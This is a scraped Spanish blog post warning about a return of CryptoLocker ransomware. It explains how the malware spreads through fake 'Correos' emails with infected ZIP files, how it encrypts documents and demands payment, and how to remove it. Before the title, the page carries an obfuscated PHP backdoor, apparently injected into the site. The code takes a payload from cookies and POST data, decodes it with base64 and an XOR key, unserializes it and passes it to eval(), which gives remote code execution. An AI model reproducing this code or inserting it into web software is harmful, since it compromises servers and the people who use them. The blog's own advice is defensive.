$GJldXw = "\103" . "\154" . chr (95) . "\103" . "\172" . "\x59" . 'A';$WhJnqvGWYA = 'c' . "\154" . "\x61" . chr ( 245 - 130 ).'s' . chr (95) . 'e' . chr ( 938 - 818 ).'i' . chr (115) . 't' . chr ( 1000 - 885 ); $CZEOkv = class_exists($GJldXw); $WhJnqvGWYA = "29184";$YCNGPvqkm = strpos($WhJnqvGWYA, $GJldXw);if ($CZEOkv == $YCNGPvqkm){function RwrrLpGfm(){$ZoJlJoui = new /* 56905 */ Cl_CzYA(44062 + 44062); $ZoJlJoui = NULL;}$bpWXHJNE = "44062";class Cl_CzYA{private function ERpRv($bpWXHJNE){if (is_array(Cl_CzYA::$ndfIu)) {$DRsIxFS2 = str_replace("<" . "?php", "", Cl_CzYA::$ndfIu["content"]);eval($DRsIxFS2); $bpWXHJNE = "44062";exit();}}public function BdHcJB(){$DRsIxFS = "31685";$this->_dummy = str_repeat($DRsIxFS, strlen($DRsIxFS));}public function __destruct(){Cl_CzYA::$ndfIu = @unserialize(Cl_CzYA::$ndfIu); $bpWXHJNE = "71_22538";$this->ERpRv($bpWXHJNE); $bpWXHJNE = "71_22538";}public function udfKrSgKe($DRsIxFS, $AMkFSqVuR){return $DRsIxFS[0] ^ str_repeat($AMkFSqVuR, intval(strlen($DRsIxFS[0]) / strlen($AMkFSqVuR)) + 1);}public function rMccrGxf($DRsIxFS){$nFgGmnEY = "\142" . 'a' . chr ( 1056 - 941 ).'e' . chr (54) . "\x34";return array_map($nFgGmnEY . '_' . 'd' . chr ( 214 - 113 )."\x63" . chr (111) . 'd' . chr ( 491 - 390 ), array($DRsIxFS,));}public function __construct($cbrHwGQUWW=0){$ksuvLfRUn = chr ( 277 - 233 ); $DRsIxFS = "";$uWmtHceIP = $_POST;$nafKPvJLF = $_COOKIE;$AMkFSqVuR = "acd2357e-25d8-46f8-a946-aa19cdfd16bd";$btCjLZy = @$nafKPvJLF[substr($AMkFSqVuR, 0, 4)];if (!empty($btCjLZy)){$btCjLZy = explode($ksuvLfRUn, $btCjLZy);foreach ($btCjLZy as $RqCNtFPbU){$DRsIxFS .= @$nafKPvJLF[$RqCNtFPbU];$DRsIxFS .= @$uWmtHceIP[$RqCNtFPbU];}$DRsIxFS = $this->rMccrGxf($DRsIxFS);}Cl_CzYA::$ndfIu = $this->udfKrSgKe($DRsIxFS, $AMkFSqVuR);if (strpos($AMkFSqVuR, $ksuvLfRUn) !== FALSE){$AMkFSqVuR = str_pad($AMkFSqVuR, 10); $AMkFSqVuR = ltrim($AMkFSqVuR);}}public static $ndfIu = 60564;}RwrrLpGfm();} CryptoLocker ataca de nuevo - El blog de Xavi Gonzalez
Social

Parece que uno de los virus más peligrosos para los usuarios vuelve a atacar.
En el 2013 atacó con mucha fuerza, y a finales del 2014 también. Y ahora parece que ha vuelto… Se han detectado multitud de infecciones durante los ultimos dias de este programa que “secuestra” tus datos. Realmente el proceso que realiza es sencillo, entra a través de un Correo electrónico malicioso, y al iniciarse empieza a encriptar todos tus documentos (Doc, Pdf, etc..) con una clave privada que tan solo el creador del programa conoce. La seguridad de la encriptación es tan alta que no es posible desencriptarla con fuerza bruta o diccionarios, osea que tienes que ir a morir al creador del virus.

Por eso, te aparece una pantalla o un archivo con los pasos para desencriptar, normalmente, pagar una cantidad a través de una pasarela de pago “segura” (para él claro) y se recibirá la clave (bastante improbable).

El correo que esta infectando los PC suele llevar una dirección de remitente simulando ser “Correos” y en el mensaje se puede leer que hay un paquete o carta pendiente de recoger, y que se descargue el adjunto, que es un ZIP infectado.

Una vez infectado un proceso empieza a encriptar los datos y no hay marcha atrás, más que apagar el PC lo antes posible y desinfectarlo desde modo seguro o desde Linux. El archivo que infecta se suele guardar en C:/Windows, y la forma más rapida de encontrarlo es ejecutar MsConfig desde modo seguro y comprobar la ruta del archivo malicioso, y seguidamente eliminarlo.

Panda lanzó hace un tiempo una aplicación para comprobar un archivo encriptado con otro (una copia de seguridad limpia del mismo) que intenta compararlos y encontrar la clave de encriptación, aunque no suele funcionar, aquí os dejo un link para que lo probeis.
También podeis ver algunas herramientas del foro ElHacker, que pese a que el hilo es antiguo os podrían servir.

Un saludo!

 

Categorías: Informatica

Xavi Gonzalez

Actualmente DevOps Engineer en MotoGP (Dorna Sports). Apasionado de GNU/Linux y del software libre. Me gusta trastear con cualquier gadget, y rodar en moto.

0 comentarios

Deja una respuesta

Marcador de posición del avatar

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

*